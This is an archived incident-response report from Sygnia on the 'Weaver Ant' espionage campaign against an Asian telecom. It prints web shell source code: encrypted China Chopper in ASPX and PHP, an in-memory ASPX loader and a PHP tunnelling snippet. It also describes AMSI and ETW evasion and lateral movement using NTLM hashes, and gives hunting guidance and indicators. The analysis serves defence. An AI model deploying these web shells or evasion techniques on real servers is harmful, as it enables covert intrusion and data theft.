{ "id": "93c4dd6a-7d4d-4291-87cc-6b01e544e1cf", "created_at": "2026-04-06T00:10:28.255692Z", "updated_at": "2026-04-10T03:30:58.014374Z", "deleted_at": null, "sha1_hash": "0715c757741fd80fc79462a363e87eade6fadcd7", "title": "Weaver Ant, the Web Shell Whisperer: Tracking a Live China-nexus Operation", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 246288, "plain_text": "Weaver Ant, the Web Shell Whisperer: Tracking a Live China-nexus\r\nOperation\r\nBy Sygnia\r\nPublished: 2025-03-24 · Archived: 2026-04-05 16:04:25 UTC\r\nExecutive Summary\r\nSygnia responded to a stealthy and highly persistent China-nexus threat actor operation targeting a major\r\ntelecommunication company in Asia. \r\nBased on our analysis, we assess that the group behind this intrusion—tracked by Sygnia as Weaver Ant—aimed to\r\ngain and maintain continuous access to telecommunication providers and facilitate cyber espionage by collecting\r\nsensitive information. \r\nThis blog explores the threat actor’s modus operandi, highlighting their use of web shells and web shell tunneling as\r\nprimary tools for maintaining persistence and enabling lateral movement throughout their operations. \r\nThis incident highlights the importance of establishing resilient defense strategies to protect against sophisticated\r\nthreats – particularly those posed by state-sponsored groups. A holistic approach to mitigating these threats combines\r\ncontinuous monitoring with proactive response mechanisms – including periodic and systematic threat hunts –\r\nalongside stringent traffic controls and system hardening practices for both legacy and public-facing devices. By\r\nembracing such an approach, organizations can enhance their ability to detect, deter, and counteract the persistent\r\nthreat presented by state-sponsored groups. \r\nA comprehensive technical annex containing the threat actor tools and payloads can be found here.\r\nIntroduction\r\nSuspicious activity triggered multiple alerts during the final phase of a forensic investigation, multiple alerts were triggered\r\nby suspicious activities. Specifically, an account previously used by the threat actor was disabled as part of remediation\r\nefforts but was subsequently re-enabled by a service account. Notably, the activity originated from a server that had not been\r\npreviously identified as compromised. \r\nFurther investigation uncovered a variant of the China Chopper web shell deployed on an internal server, which had been\r\ncompromised for several years. It appeared that the remediation of the first threat actor inadvertently disrupted the\r\noperations of a second, China-nexus threat group, tracked by Sygnia as Weaver Ant. \r\nThis discovery prompted a large-scale forensic investigation, including an extensive hunt for additional web shell variants.\r\nUtilizing YARA rules and other enrichment mechanisms, the team identified dozens of similar web shells. The investigation\r\nrevealed an entire campaign that relies exclusively on web shells for persistent access, enabling both remote code execution\r\nand lateral movement through an intricate tunneling process. \r\nThe Web Shells Dynamic Duo\r\nDuring the web shell hunt, numerous instances of web shells were discovered, prompting a thorough classification effort.\r\nThis analysis revealed that the threat actor primarily utilized two types of web shells in different variants: one was classified\r\nby Sygnia as an encrypted China Chopper, while the second had no publicly available references to any known web shells\r\nand was named by Sygnia the ‘INMemory’ web shell.  \r\nEncrypted China Chopper\r\nThe China Chopper web shell is a lightweight malicious tool that enables threat actors to gain remote access and control\r\nover compromised web servers. Originally developed by Chinese threat actors, it offers functionalities such as file\r\nmanagement, command execution, and data exfiltration. Its small size and stealthy nature make China Chopper ideal for\r\nmaintaining persistent access, facilitating further exploitation, and evading detection by traditional security measures.\r\nAdditionally, its versatility and ease of use have made it a popular choice for executing a wide range of malicious activities\r\non targeted systems.\r\nThe most common web shell that was utilized by this threat actor, was a China Chopper web shell which supports AES\r\nencryption of the payload. Despite its simplicity and straightforward functionality, this web shell is highly effective at\r\nbypassing automated payload detection mechanisms at the Web Application Firewall (WAF) level.\r\nDeployed primarily on externally facing servers, the encrypted China Chopper web shell was implemented in various\r\nprogramming languages, including ASPX and PHP. The compromised servers served as entry points, enabling the threat\r\nactor to infiltrate the victim’s network and establish persistent access.\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 1 of 10\n\n{\r\n var key = \u003ccustom_key\u003e;\r\n var iv = \u003ccustom_iv\u003e;\r\n var buf = Convert.FromBase64String(text);\r\n var rm = new System.Security.Cryptography.RijndaelManaged();\r\n rm.Key = System.Text.Encoding.UTF8.GetBytes(key);\r\n rm.IV = System.Text.Encoding.UTF8.GetBytes(iv);\r\n rm.Mode = System.Security.Cryptography.CipherMode.CBC;\r\n rm.Padding = System.Security.Cryptography.PaddingMode.Zeros;\r\n return System.Text.Encoding.UTF8.GetString(rm.CreateDecryptor().TransformFinalBlock(buf, 0, buf.Length));\r\n}\r\neval(AES(Request.Item[\u003ccustom_param_name\u003e]), \"unsafe\");\r\n%\u003e\r\nFigure 1: ASPX version of the China Chopper with encryption web shell. The ‘\u003ccustom_param_name\u003e‘, ‘\u003ccustom_key\u003e‘,\r\nand ‘\u003ccustom_iv\u003e‘ strings are placeholders.\r\n\u003c?php\r\n$key = \u003ccustom_key\u003e;\r\n$iv = \u003ccustom_iv\u003e;\r\n@eval(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($_POST[\u003ccustom_param_name\u003e]), MCRYPT_MODE_CBC, $\r\n?\u003e\r\nFigure 2: PHP version of the China Chopper with encryption web shell. The ‘\u003ccustom_param_name\u003e‘, ‘\u003ccustom_key\u003e‘,\r\nand ‘\u003ccustom_iv\u003e‘ strings are placeholders.\r\nTwo features of the encrypted web shell posed challenges during the forensic investigation: \r\nKeyword-based evasion: The threat actor strategically used specific keywords as parameter names in the payload\r\nfield, such as ‘password,’ ‘key,’ and ‘pass.’ This acted as a defense evasion technique, as many WAFs automatically\r\nredact or mask these values in logs. As a result, the actual payload content was obscured, making it difficult to\r\nmonitor or analyze the transferred data. \r\nPayload truncation: The size of the transmitted payload exceeded the character limit supported by the deployed WAF\r\nsolution, leading to truncation of the logged data. This limitation prevented a complete forensic reconstruction of the\r\npayload, further complicating the investigation. \r\nINMemory Web Shell\r\nThe second web shell observed in this intrusion enables in-memory execution of malicious modules. \r\nThis web shell functions by decoding a hardcoded GZipped Base64 string into a Portable Executable (PE) named ‘eval.dll’\r\nand executing it entirely in memory to evade detection. The in-memory execution flow consists of the following steps: \r\n1. Decoding the Base64-encoded string into a byte array. \r\n2. Creating a memory stream to store the encoded bytes (‘memoryStream2’). \r\n3. Decompressing the memory stream and creating a GZIP stream. \r\n4. Writing the decompressed bytes to a new memory stream and converting them into a byte array. \r\n5. Loading the decoded and decompressed byte array using ‘Assembly.Load’, executing the malicious payload without\r\nwriting it to disk. \r\nTo further evade detection, the web shell obfuscates code using Base64-encoded strings. A function called ‘invoke’ is\r\nexecuted within the web shell using two Base64-encoded strings: \r\n‘RVZBTC5IYW5kbGVy’ → Decoded to ‘EVAL.Handler’ (where ‘EVAL’ represents the relevant namespace, and\r\n‘Handler’ refers to the class). \r\n‘SW52b2tl’ → Decoded to ‘Invoke’, the specific function in the malicious payload. \r\n\u003cscript id=\"no-caching\" runat=\"server\"\u003e\r\nstring cc(string a){ return Encoding.UTF8.GetString(Convert.FromBase64String(a)); }\r\nbyte[] ee(string p){\r\n string k=cc(\"RVZBTC5IYW5kbGVy\");\r\n Assembly a=Application[k]==null?(Application[k] as Assembly):null;\r\n if (a==null){\r\n var b=Convert.FromBase64String(\u003cbase64_encoded_dll\u003e);\r\n using(var d=new MemoryStream()){\r\n using(var s=new MemoryStream(b)){\r\n using(var g=new GZipStream(s,CompressionMode.Decompress)){\r\n b=new byte[1024];int c=0;while((c=g.Read(b,0,b.Length))\u003e0){d.Write(b,0,c);}\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 2 of 10\n\n}\r\n }\r\n b=d.ToArray();\r\n }\r\n a=Assembly.Load(b);Application[k]=a;\r\n }\r\n return (byte[])(a.GetType(k).GetMethod(cc(\"SW52b2tl\")).Invoke(null,new object[]{Application,Request.Params\r\n}\r\nvoid Page_Load(object sender,EventArgs e){\r\n try{\r\n var ret=ee(\u003cdll_parameters\u003e);\r\n if(ret.Length==3\u0026\u0026Encoding.UTF8.GetString(ret)==\"404\"){\r\n Response.StatusCode=404;\r\n }else{\r\n Response.BinaryWrite(ret);\r\n }\r\n }catch(Exception ex){\r\n Response.Write(ex.ToString());\r\n }\r\n}\r\n\u003c/script\u003e\r\nFigure 3: ASPX version of the ‘INMemory’ web shell. The ‘\u003cbase64_encoded_dll\u003e’ refers to the Base64 version of the\r\n‘eval.dll’ file, while ‘\u003cdll_parameters\u003e’ refers to the payload for execution.\r\nExecution using ‘eval.dll’\r\nThe ‘INMemory’ web shell executed the C# code contained within a portable executable (PE) named ‘eval.dll’, which\r\nultimately runs the payload delivered via an HTTP request. This PE is hardcoded within the web shell as a GZipped Base64\r\nstring and is stored in the variable ‘b’ (represented as ‘\u003cbase64_encoded_dll\u003e’ in the snippet code above).  \r\nUpon execution, the web shell invokes a function called ‘Invoke’, passing in the web server’s request parameters along with\r\na hardcoded SHA256 hash. The function performs the following operations: \r\n1. SHA256 Hash Matching:\r\n1. The ‘Invoke’ function calculates the SHA256 hash of each HTTP request header. \r\n2. It then compares the calculated hash to the hardcoded SHA256 value.\r\n2. Payload Encoding \u0026 Execution:\r\n1. If a matching header is found, the content undergoes two-stage encoding: \r\n1. First Stage: Base64 encoding.\r\n2. Second Stage: UTF-8 encoding. \r\n2. Finally, the encoded content is executed using ‘JScriptEvaluate’, a function from the JScript library, allowing\r\nthe payload to run dynamically.\r\nEmploying SHA256-based header validation and multi-stage encoding enhances the web shell’s evasion capabilities,\r\nmaking forensic detection more challenging. The use of ‘JScriptEvaluate’ further complicates analysis, as it enables\r\nexecution of obfuscated, dynamically loaded code within the compromised environment. \r\nprivate static string sha256_hash(object value)\r\n{\r\n StringBuilder stringBuilder = new StringBuilder();\r\n SHA256 sha = SHA256.Create();\r\n byte[] array = sha.ComputeHash(Encoding.UTF8.GetBytes(Microsoft.JScript.Convert.ToString(value, true)));\r\n for (double num = (double)0; num \u003c (double)((Array)array).Length; num += (double)1)\r\n {\r\n StringBuilder stringBuilder2 = stringBuilder;\r\n byte b = array[checked((int)Microsoft.JScript.Convert.CheckIfDoubleIsInteger(num))];\r\n stringBuilder2.Append(b.ToString(\"x2\"));\r\n }\r\n return stringBuilder.ToString();\r\n}\r\nFigure 4: Function ‘SHA256_hash’ from ‘eval.dll’.\r\ntext = Encoding.UTF8.GetString(System.Convert.FromBase64String(nameValueCollection[Microsoft.JScript.Convert.T\r\nEval.JScriptEvaluate(text, vsaEngine);\r\nFigure 5: encoding and execution of the payload from ‘eval.dll’.\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 3 of 10\n\nThe 'JScriptEvaluate' function from the JScript library is used to evaluate a specified JScript code - in this case, ‘text’, which\r\ncontains the decoded content extracted from the HTTP request. This evaluation is performed using a designated execution\r\nengine, ‘vsaEngine’.\r\nThe VSA Engine (Visual Studio for Applications Engine) is a component of the JScript library that enables just-in-time (JIT)\r\ncompilation and execution of code at runtime. By leveraging this mechanism, the web shell can dynamically execute\r\nobfuscated or remote-injected payloads without writing them to disk.\r\nOther Means of (Stealth) Monitoring\r\nDuring the extensive web shell hunt, it became apparent that Weaver Ant was still operating within the compromised\r\nnetwork. To successfully investigate an advanced persistent threat, it was necessary to implement stealth monitoring to avoid\r\ncompromising the ongoing investigation and to prevent the threat actor from altering or halting their operations temporarily\r\nto remain undetected.  \r\nThe implemented monitoring was not performed on the compromised machines themselves, as deploying a monitoring tool\r\nmight alert the threat actor. Instead, we established a combination of port mirroring techniques and designed an architecture\r\nto automate the decryption and de-encapsulation of the tunneled web shell traffic. This approach helped overcome visibility\r\ngaps caused by various components, such as the WAF limitations described above. \r\nBy streamlining live data across multiple log sources, including the raw and complete HTTP requests and responses, we\r\nwere able to identify numerous payloads deployed by the threat actor and uncover a large-scale operation with persistency\r\nmechanisms deployed on tens of servers. \r\nThe threat actor deployed minimalist web shells on compromised machines - often consisting of just a single line of code,\r\nsuch as a modified version of China Chopper - the web shells served merely as conduits for executing more sophisticated\r\npayloads to achieve the actual objectives. We observed multiple types of payloads with distinct purposes, with one of the\r\nmost notable being a recursive HTTP tunnel tool. \r\nRecursive HTTP Tunnel Tool\r\nThe recursive tunnel tool functioned as a ‘second stage’ web shell, enabling HTTP tunneling to access internal resources. It\r\noperated by forwarding requests to other web servers and supported both ASPX and PHP versions, ensuring compatibility\r\nacross different server technologies. The tool decoded parameters (e.g., ‘p1’, ‘p2’, and ‘f’) to dynamically construct and\r\nexecute cURL commands based on the execution flow. \r\nSteps in the tunneling mechanism included: \r\nDecrypting the recursive tunnel tool encrypted payload. \r\nDecoding parameters (‘p1’ and ‘p2’) from Base64. \r\nParsing parameters to reconstruct HTTP requests or cURL commands. \r\nDynamically building and executing payloads based on the provided inputs. \r\nReturning the server's response after forwarding the request. \r\nThis adaptive tunneling mechanism allowed the threat actor to seamlessly navigate different web environments and maintain\r\noperational flexibility. \r\nfunction o($data) {\r\n return base64_encode($data);\r\n}\r\ntry{\r\n $p1 = base64_decode($_POST['p1']);\r\n $p2 = base64_decode($_POST['p2']);\r\n $f = $_POST['f'];\r\n...\r\n...\r\n...\r\n array_push($hi, 'Content-Type: application/x-www-form-urlencoded');\r\n curl_setopt($client, CURLOPT_HTTPHEADER, $hi);\r\n }\r\n if(strlen($c) \u003e 0){\r\n curl_setopt($client, CURLOPT_COOKIE, $c);\r\n }\r\n curl_setopt($client, CURLOPT_POSTFIELDS, $data);\r\n $resp = curl_exec($client);\r\nFigure 6: Code Snippet from the PHP variant of the Recursive HTTP Tunnel Payload.\r\nTunneling in Web Shell?\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 4 of 10\n\nWhile web shells are commonly used for persistence or code execution on a compromised host, they can also be utilized for\r\nlateral movement and command and control. In this blog, we will refer to this technique as Web Shell Tunneling.  \r\nWeb shell tunneling is a method that leverages multiple web shells as ‘proxy servers’ to redirect inbound HTTP traffic to\r\nanother web shell on a different host for payload execution. This enabled Weaver Ant to operate on servers within different\r\nnetwork segments - typically internal servers not directly connected to the internet- by leveraging existing publicly\r\naccessible servers as operational gateways.  \r\nThe web shell tunneling method has been observed before, employed by various threat actors such as Elephant Beetle. The\r\nprimary advantage of web shell tunneling is that it facilitates lateral movement within a compromised environment without\r\nthe need to deploy additional tools on the compromised hosts.\r\nFigure 7: Web Shell Tunneling flow.\r\nAnother benefit of this technique is that communication occurs over HTTP/S traffic, which may appear legitimate since the\r\ncompromised server hosts a web service and inbound traffic is expected over these ports.  \r\nImplementing this method requires the ability to generate HTTP/S traffic from compromised hosts, either through existing\r\nweb shell functions or by executing a custom payload on the compromised system. Once this capability is achieved, web\r\nshells can function as proxy servers, redirecting encapsulated command traffic to different hosts. \r\nUncovering the Matryoshka\r\nThe traffic flowing through the web shell tunneling was encrypted. To support forensic investigation needs, we employed\r\nport mirroring to capture each packet received by one of the compromised web servers. This allowed us to replicate the\r\nentire traffic received by Weaver Ant in a decrypted format, enabling us to trace the actions of the threat actor's payloads. \r\nSince the payloads were symmetrically encrypted with a hardcoded key embedded within the web shell itself, Sygnia’s IR\r\nteam developed automation to decrypt any new payloads received by the web shell. \r\nThis enabled us to ‘peel’ each layer of encryption and obfuscation within the payload code upon receiving the full output,\r\nthereby recovering the actual command or binary intended for execution on the server side.  Weaver Ant occasionally sent\r\nonly the ‘p1’ parameter and sometime both ‘p1’ and ‘p2’ - with ‘p2’ indicating the transmission of another payload to a\r\ndifferent web server from one web shell to another. \r\nThe threat actor’s method is analogous to a ‘Matryoshka’ doll, where each layer conceals another, more critical layer within\r\nit. In this scenario, the malicious payloads were encapsulated in multiple layers of encryption and obfuscation, with each\r\nlayer being ‘peeled back’ by the next-in-line web shell to reveal the subsequent payload for execution. This layering allowed\r\nthe threat actor to remain evasive, with the true malicious intent only becoming apparent once the final payload was\r\nunveiled, much like the smallest doll hidden inside a nesting set. \r\nAfter unwrapping all layers of the ‘Matryoshka’, it became evident that during this campaign, Weaver Ant deployed multiple\r\npayloads, each serving a distinct purpose. These payloads demonstrate the threat actor’s sophistication and stealth, enabling\r\nthem to achieve their objectives while evading detection and maintaining persistent access within the network. \r\nThe following sections describe some of these payloads: \r\nETW Patch \u0026 AMSI Bypass\r\nTo evade detection, Weaver Ant employed defense evasion techniques each time they operated on a compromised host, by\r\nloading malicious modules directly into memory.  \r\nETW (Event Tracing for Windows) is a kernel-level tracing mechanism used for logging and monitoring system events. The\r\nthreat actor patched event tracing processes, tampering with event logs such as Sysmon. This manipulation caused critical\r\nlogs to be suppressed or dismissed, enabling the attacker to remain undetected. \r\n AMSI (Antimalware Scan Interface) is a Microsoft interface that allows applications and services to integrate with\r\nantimalware products. To bypass AMSI protections, the attacker overwrote the ‘AmsiScanBuffer’ function in the ‘amsi.dll’\r\nmodule. This modification rendered AMSI integrations with security tools, such as EDR and antivirus software, ineffective,\r\nallowing malicious PowerShell commands to execute without interference. \r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 5 of 10\n\nPowerShell without PowerShell\r\nWeaver Ant employed a technique that leveraged the Windows module ‘System.Management.Automation.dll’ to execute\r\nPowerShell commands without initiating the PowerShell.exe process. ‘System.Management.Automation.dll’ is the core\r\nassembly that provides the PowerShell runtime, enabling scripts and commands to be executed within the Windows\r\nenvironment without the need for the standalone PowerShell executable.  \r\nSince this module underpins PowerShell’s functionalities, the threat actor could perform reconnaissance, lateral movement,\r\nand prepare data exfiltration without triggering monitoring tools that typically flag PowerShell.exe activity. By avoiding the\r\nstandard PowerShell process, the threat actor bypassed heuristic and behavioral detections commonly associated with\r\nPowerShell.exe, thereby evading traditional security measures. This significantly reduced the likelihood of detection. \r\nLateral Movement over SMB \r\nLeveraging the ‘PowerShell without PowerShell’ execution technique, Weaver Ant employed known PowerShell modules\r\nand tools, such as ‘Invoke-SMBClient’, to conduct reconnaissance and facilitate lateral movement from compromised web\r\nservers and other servers within the network. ‘Invoke-SMBClient’ is a PowerShell module that enables interactions with\r\nSMB shares, allowing tasks like listing shares, uploading files, and executing commands remotely.\r\nThis enabled the threat actor to deploy web shells on additional web servers, thereby expanding persistence within the\r\ninternal network and creating new external access vectors. \r\n‘Invoke-SMBClient’ was executed using valid credentials, leveraging high-privileged local or domain accounts with\r\npasswords that had not been rotated for years. Instead of clear-text passwords, the threat actor used NTLM hashes to invoke\r\nthe tool. \r\nAs part of the lateral movement flow, Weaver Ant retrieved web server access logs and configuration files (e.g.,\r\n‘web.config’, ‘applicationHost.config’) from remote IIS web servers. The objectives were to harvest clear-text credentials\r\nstored in configuration files, establish understanding of how the IIS server operates and determine whether the server was\r\nserving external users. \r\nFigure 8: Web shell deployment chain.\r\nReconnaissance Activities\r\nAs part of its reconnaissance efforts, Weaver Ant executed various ‘Invoke-SharpView’ commands against multiple Domain\r\nControllers within the same Active Directory (AD) Forest. These commands included: ‘Get-DomainUserEvent’, ‘Get-DomainSubnet’, ‘Get-DomainUser’, ‘Get-NetSession’ etc. \r\nThe primary objective was to enumerate the compromised Active Directory environment to identify high-privilege accounts\r\nand critical servers and add them to their target bank. \r\nThe command outputs were typically saved as files under ‘ C:\\ProgramData ’, then compressed using the ‘Invoke-ZIP’\r\nPowerShell function before exfiltration.\r\nA PowerShell command with PID '1111' was executed from '\u003cCOMPUTERNAME\u003e(Microsoft Windows NT 10.0.14393.0)' usi\r\n...\r\n...\r\n...\r\n...\r\nfunction Invoke-ZIP{\\r\\nparam(\\r\\n [Parameter(Mandatory=$true)]\\r\\n [string] $Folders,\\r\\n [string] $\r\nFigure 9: Code Snippet from PowerShell transcript log of a compromised server showing reconnaissance activities.\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 6 of 10\n\nA Note on Attribution\r\nThe malicious activities detailed in this report represent a subset of those investigated in connection with a specific Weaver\r\nAnt campaign. Weaver Ant is a threat actor exhibiting characteristics typical of a China-nexus targeted threat group. These\r\ncharacteristics include but are not limited to: \r\nTarget selection: Focused on specific industries and geographic locations that align  with China’s cyber strategy. \r\nClear definition of goals: Well-defined objectives guided their operations. \r\nDeployment of web shells: Notably, a wide reliance on China Chopper web shell variants. \r\nAttack times: Weaver Ant carried out malicious activities primarily with the GMT +8 time zone, operating on regular\r\nworking days while avoiding weekends and holidays. \r\nLeveraged an Operational Relay Box (ORB) networks : Weaver Ant utilized a non-provisioned ORB network to\r\nproxy traffic and conceal their infrastructure. This network primarily consists of compromised Zyxel CPE routers\r\n(mostly with firmware version of VMG3625-T20A) operated by Southeast Asian telecommunication providers. By\r\nusing the ORB network, the threat actor leveraged a compromised device from one telecom to pivot and target a\r\ndevice in another telecom. \r\nMalicious DLL deployment: Leveraged various techniques to load trojanized DLLs to infect systems. \r\nBackdoor utilization: Employed a backdoor previously attributed to Chinese APT groups by Cybereason and\r\nTrendMicro (https://www.cybereason.com/blog/research/deadringer-exposing-chinese-threat-actors-targeting-major-telcos?#cluster-c).\r\nWeaver Ant demonstrated exceptional persistence, maintaining activity within the compromised network for over four years,\r\ndespite multiple eradication attempts. Throughout this period, Weaver Ant adapted their TTPs to the evolving network\r\nenvironment, employing innovative methods to regain access and sustain their foothold. \r\nThe modus operandi of Chinese-nexus intrusion sets typically involves the sharing of tools, infrastructure, and occasionally\r\nmanpower—such as through shared contractors. This collaborative approach complicates Sygnia's efforts to attribute attacks\r\nto any previously identified group. Additionally, the high visibility within the network hinders Sygnia from confidently\r\nruling out the possibility of a ‘false-flag’ operation orchestrated by a different APT group. \r\nPost Kill-Switch Monitoring\r\nFollowing the investigation and mapping of all identified Weaver Ant web shells, we conducted a coordinated eradication\r\neffort to remove them from compromised hosts. \r\nAs part of this effort, we implemented additional visibility enhancements to closely monitor the environment, operating\r\nunder the assumption that Weaver Ant is a highly capable and persistent APT. Given their focus on espionage, it was deemed\r\nhighly likely that they would attempt to resume operations. This assumption is critical when countering such threat actors. \r\nThe monitoring efforts proved effective—Weaver Ant were detected attempting to regain access to the victim’s network.\r\nSygnia has been closely tracking and investigating their renewed activity, and a follow-up blog post will be published,\r\nrevealing their ‘upgraded’ modus operandi and tools. Spoiler alert: They still have a strong preference for web shells. \r\nRecommendations for Hunting Weaver Ant\r\nEnsure IIS logging is enabled and ingested into the SIEM, with X-Forwarded-For (XFF) headers configured.\r\nMonitor for any disruptions or stoppages in log ingestion.\r\nMonitor for web pages creation by web server processes (i.e., ‘w3wp.exe’, ‘tomcat6.exe’). \r\nMonitor for command execution originating from web server processes (i.e., ‘w3wp.exe’, ‘tomcat6.exe’). \r\nMonitor for incoming HTTP requests with unusually large payloads in the request’s body. \r\nMonitor for unexpected parameters names or values in incoming HTTP requests. \r\nEnable PowerShell transcript logging to capture and analyze suspicious activity. \r\nRecommendations for Defending Against Weaver Ant\r\nMinimize Privileges: Restrict web-service accounts to the least privileges required. \r\nControl Management Traffic: Use ACLs and firewall rules to limit management traffic between web servers and\r\ninternal systems, especially for SMB and HTTP/S. \r\nEnforce Credential Hygiene: Implement LAPS, gMSA, or a PIM solution to regularly rotate credentials. \r\nEnhance Detection: Deploy EDR/XDR solutions to monitor memory for malicious activity, including obfuscated in-memory web shells. \r\nStrengthen Web Security: Tune WAF and logging systems to detect obfuscated code signatures and behavioral\r\npatterns linked to China Chopper and INMemory web shells.\r\nAppendix I: Indicators of Compromise\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 7 of 10\n\nSHA1 SHA256\r\n207b7cf5db59d70d4789cb91194c732bcd1cfb4b 076364dd23d46c40d00fc62baa9826a4c74900cc0f31605b15d92153b184dd7a\r\n4fa2b2ab3e24ee9d130cfeda63c7ae1ccbc393dc 1ba9bba238cb2818a469630e86631cc1a5f840893dcc463baff5a772e47922a6\r\n4aeeae023766153a91b83d02b1b24da20c0dd135 20156a215ae023123dfd6c5396276aa6575583bb9944bb05586d4c5f9526e2e8\r\n4dd22a08a5b103e1f2238aed7f7ce66c5a542533 24cf92ec8c3262bd8eb9eb381229da082617c97caefe8ac9e6f931d1251f7e40\r\n4dc0ebfa52adf9b9eb4fa8f0a359c21a14e183fb 25f0ed5fca4a823c06d9eb86dc121ba814db31110d94a77bfde775b4b286c5fb\r\nd102a34b3f0efb57f1d9f04eff26b256875a3aa1 307c99257d6049d6a3c53fb928db80d17d99ee83b336fe1d25ea4f8ad61926ac\r\nff7b2c3938306261881c42e78d0df51d9bcdd574 344d8621cdc4c063d8967a7ca82b68ad90477fd24f280287a0236c3dd5d3956b\r\nf31920d636224356e8c7a182c2b9b37e42a09181 3dc91bdd912f07c514ab30382c6ac2204861d44559c86f88b5afd2a9d99d7364\r\n49cd96df4c85cdd7461701340c0bb4d05a5049d8 4610747272f6e968b2edcab1f00b3162ec34787630a1119f32e1ea7d82dc96ab\r\n9dc3d272652851428f5cc44f2fd9458bff1d6a78 4a4d70c3fca0f3ef8643af93e87cd1b78b7d464f78c26f9130980ecd8b2d65c8\r\n151dc47b213aaec3751ffd1427737c65757ab410 50a045e685ff8df1ec84e2e530e1df4215438f6a0ac79f4d0a29e51fd24d22de\r\n9022f78087e1679035e09160d59d679dc3ac345d 55c8099243bb01be64f1fb0f883e99519acb6adb3c6be8b545159d7554151ba1\r\n0e282dc84d6cfd447fece7d3ecc622523b143aa8 5661e2bf6d9379b6137ea10a2e725d2a18ccf0f704743fd76b15ba48d17fa052\r\nbe52275b0c2086735dac478dc4f09fd16031669a 6598ea73d7e437950b3e8caa21229eec7ebcdf22de413384aa2f212df23ebca3\r\n55eeaa904bc6518a2715cc77648e6c5187416a46 6aae79fe0cda1d7ba3c5c0abccaee8a7b759900c9748fa06d2ec1e004ba3c5ab\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 8 of 10\n\na5c36b8022751cfeb4a88a21153847df3870c7c0 70f16fb2292e5bae76b5b020a4cea21e58021fabf3d0bbd76ae3fa6e31a9fd81\r\n2b9b740fb5fe0549810500476f567002683df71d 8ED905A73212A18C6D10055F15C917AC9D20F672854B12FAA7483D2F4D93841B\r\n02065bbdb3209e0522db3225600b8e79f8a10293 9533e8585b73604fd41b7e015d31f65198784c0da2e6e8f2fe35c0f6d12398af\r\n25a593b9517d6c325598eab46833003c40f9491a b82aea5e61ecb39ffb592e80d22a6b7646c266af2cb28d0743c906ac13dafb51\r\nad3dbec2b621807fa9a2f1b2f575d7077e494626 CA10DA18A28963EF375C3D23A49E55BC90777E267D9EBD11541033A1766F44F1v\r\nc879a8eb6630b0cd7537b068f4e9af2c9ca08a62 cc6833017fd0d2b7e5df5a9644ead67cc0aa8981e1e6a231bc0416a3bb410069\r\n3cac6ff7cddcb8f82409c79c85d976300fc60861 d6f3fc16862345627e61d15534044800a5fd68ebc9a539d8f63cb40a8b0238c0\r\n23c4049121a9649682b3b901eaac0cc52c308756 daab9b2deeea41cb1f7849fbc46a40168c542df098abb615d1aa8e34548684de\r\n334a88e288ae18c6e3fd7fb2d1ad9548497d52ce dd2964927ae0f8c78175921523e630d9b36f48b57028f6d57726c4b8d9109fa8\r\na9bbea73504139ce91a0ec20fef303c68a131cd4 dee501523816cfac7ac4e53fb18d9e902f3ec17916491c5864f9fc4f39419897\r\n495a4b4757f3b1eec7fdaa9d0b2930071565f2b1 df50d1016c9f6952f0efc1646f4203bb71e6d851d761698f56a802be6b357f71\r\n492cbe143f795888d8e5006ac595f65f4565ed6e eec128dc9d1f4677fc462f6ec74a432169373926a827358a73c0f0961595adb6\r\n81622512757f897206a84b29ee866fb933fa3d48 eee9dd8363492ceb7449c0c00f0d5deed9e79b745920b34f051b5dd7f1f9959d\r\n089439168d3c75b4da94ab801f1c46ad6b9e1fdc\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 9 of 10\n\nAppendix II: MITRE ATT\u0026CK Matrix Mapping\r\n1. Initial Access \r\n1. T1190- Exploit Public-Facing Application \r\n2. Execution\r\n1. T1059.001 - Command and Scripting Interpreter: PowerShell \r\n2. T1059.003 - Command and Scripting Interpreter: Windows Command Shell \r\n3. T1059.005 - Command and Scripting Interpreter: Visual Basic \r\n4. T1059.007 - Command and Scripting Interpreter: JavaScript \r\n3. Persistence\r\n1. T1078.002 - Valid Accounts: Domain Accounts \r\n2. T1078.003 - Valid Accounts: Local Accounts \r\n3. T1505.003 - Server Software Component: Web Shell \r\n4. Privilege Escalation \r\n1. T1078.002 - Valid Accounts: Domain Accounts \r\n2. T1134.001 - Access Token Manipulation: Token Impersonation/Theft \r\n5. Defense Evasion\r\n1. T1055 - Process Injection \r\n2. T1134.001 - Access Token Manipulation: Token Impersonation/Theft \r\n6. Credential Access \r\n1. T1552.001- Unsecured Credentials: Credentials In Files \r\n2. T1003.002 - OS Credential Dumping: Security Account Manager \r\n7. Discovery \r\n1. T1087.002 - Account Discovery: Domain Account \r\n2. T1083 - File and Directory Discovery \r\n3. T1135 - Network Share Discovery \r\n4. T1018 - Remote System Discovery \r\n5. T1082 - System Information Discovery \r\n6. T1016 - System Network Configuration Discovery \r\n8. Lateral Movement \r\n1. T1021.001 - Remote Services: SMB/Windows Admin Shares \r\n2. T1570 - Lateral Tool Transfer \r\n9. Collection \r\n1. T1560.001 - Archive Collected Data: Archive via Utility \r\n2. T1074.001 - Data Staged: Local Data Staging \r\n10. Command and Control  \r\n3. T1071.001 - Application Layer Protocol: Web Protocols \r\n4. T1572 - Protocol Tunneling \r\n5. T1090.001 - Proxy: Internal Proxy \r\n11. Exfiltration\r\n1. T1048 - Exfiltration Over Alternative Protocol\r\nIf you were impacted by this attack or are seeking guidance on how to prevent similar attacks, please contact us 